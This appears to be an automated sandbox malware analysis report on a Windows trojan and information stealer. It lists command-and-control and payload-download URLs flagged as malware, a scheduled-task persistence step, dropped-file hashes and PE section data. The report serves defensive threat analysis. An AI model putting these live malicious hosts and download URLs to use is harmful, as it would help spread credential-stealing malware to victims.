                                                                                                http://crl.microhDl6wuWiQdg.exe, 00000000.00000003.2302459604.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://185.215.113.43/Zu7JuNko/index.php1/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://fancywaxxers.shop/inDl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://185.215.113.16/mine/random.exetDl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://fancywaxxers.shop/ahDl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        https://fancywaxxers.shop/Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://185.215.113.43/Zu7JuNko/index.phpnskotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://185.215.113.43/Zu7JuNko/index.php)/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaDl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.215.113.43/Zu7JuNko/index.php%/skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              185.215.113.43
                                                                                                              unknownPortugal
                                                                                                              206894WHOLESALECONNECTIONSNLtrue
                                                                                                              104.21.112.1
                                                                                                              fancywaxxers.shopUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              185.215.113.16
                                                                                                              unknownPortugal
                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1582703
                                                                                                              Start date and time:2024-12-31 09:47:33 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 8m 11s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:10
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:Dl6wuWiQdg.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:b71b7aedba64dfac7fb62b18fe22e956.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@1/3
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 80%
                                                                                                              HCA Information:Failed
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target Dl6wuWiQdg.exe, PID 6248 because there are no executed function
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              03:48:27API Interceptor10x Sleep call for process: Dl6wuWiQdg.exe modified
                                                                                                              03:49:01API Interceptor1437808x Sleep call for process: skotes.exe modified
                                                                                                              09:48:47Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              185.215.113.43o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 185.215.113.43/Zu7JuNko/index.php
                                                                                                              104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                              • beammp.com/phpmyadmin/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              fancywaxxers.shopbzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.16.1
                                                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.48.1
                                                                                                              UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.96.1
                                                                                                              R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.32.1
                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.80.1
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              WHOLESALECONNECTIONSNLbzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 185.215.113.206
                                                                                                              eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.16
                                                                                                              CLOUDFLARENETUSbzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                              • 172.64.41.3
                                                                                                              Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 172.64.41.3
                                                                                                              x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              • 172.67.136.42
                                                                                                              re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                              • 188.114.96.3
                                                                                                              file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.3
                                                                                                              PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 188.114.96.3
                                                                                                              WHOLESALECONNECTIONSNLbzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 185.215.113.206
                                                                                                              eYAXkcBRfQ.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              JpzbUfhXi0.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 185.215.113.16
                                                                                                              o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 185.215.113.16
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              PO#5_tower_Dec162024.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                              • 104.21.112.1
                                                                                                              x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.112.1
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3243520
                                                                                                              Entropy (8bit):6.653095926618001
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                              MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                              SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                              SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Reputation:low
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3243520
                                                                                                              Entropy (8bit):6.653095926618001
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                              MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                              SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                              SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Reputation:low
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):302
                                                                                                              Entropy (8bit):3.4487250633525943
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:XmsXUhXUEZ+lX1CGdKUe6tE9+AQy0lbtWEt0:XF4Q1CGAFD9+nVb9t0
                                                                                                              MD5:12B4C233DABE8764D99D6DA23AE55FA3
                                                                                                              SHA1:71E999ED6CE918A80620D5CD0E56B6912FCC1976
                                                                                                              SHA-256:9A245618CC25B1C4FD1EAD54128F32A4C4C2933BA69AA9D3102113BB9CB675EB
                                                                                                              SHA-512:A7D76FC747BC8755FEEB9F571FE24ABF97427FF687E819B684721C8ACCF5EA8F976F31F560F822E8BCE0EC9C849031F051DFD5A2A4B81C7C5A7E32BBBFDFF468
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:...........D...p..^.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................1.@3P.........................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.9480560701728304
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:Dl6wuWiQdg.exe
                                                                                                              File size:1'868'288 bytes
                                                                                                              MD5:b71b7aedba64dfac7fb62b18fe22e956
                                                                                                              SHA1:94dbd7b49946dac493466b8702f7ca527833b9cc
                                                                                                              SHA256:a28bd583dab27c6e95c9f14ae64bd0b6831cc9226737f68b1a8bf9dd033843fa
                                                                                                              SHA512:0bc645d8e32ff722890e864d8f6ed8c4ab61372dc437ea146f9e920b8fecccfc4a3102e3773aaa3e5ab2a767b6f392ff0a8f2098e44a210db5cf19be5b16e18b
                                                                                                              SSDEEP:24576:wm34NGu4QOrYpj44bPupQKfXOzihBGxPJwFsYW/VY4TO7j013wx/AZM4tdMilBEh:Zruq0G4ja+KB3eYmF0AZRz
                                                                                                              TLSH:538533543C70301CDD9BEFB695BB8AEEAB1829148C924B776FA0C02374971D3D49C75A
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................J......s....@.................................Y@..m..
                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                              Entrypoint:0x89d000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                              Instruction
                                                                                                              jmp 00007F36B8B629EAh
                                                                                                              punpcklbw mm3, qword ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007F36B8B649E5h
                                                                                                              add byte ptr [edi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ebx], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax+eax*4], cl
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              pop es
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], dh
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              or byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ecx], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              push es
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ebx+05h], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add cl, byte ptr [edx]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              xor byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              or al, 80h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x520000x26000e0e4cc0bc509ec0ecb5b0a5f82be1a4eFalse0.9999229029605263data7.983145979605079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              0x550000x2a80000x200841a807ecf1416c63fa6b9d6f0256426unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              ffxetdru0x2fd0000x19f0000x19e4005ab840d1a3503d0bb88244f08cfeb13aFalse0.994471253583283data7.953108190155835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
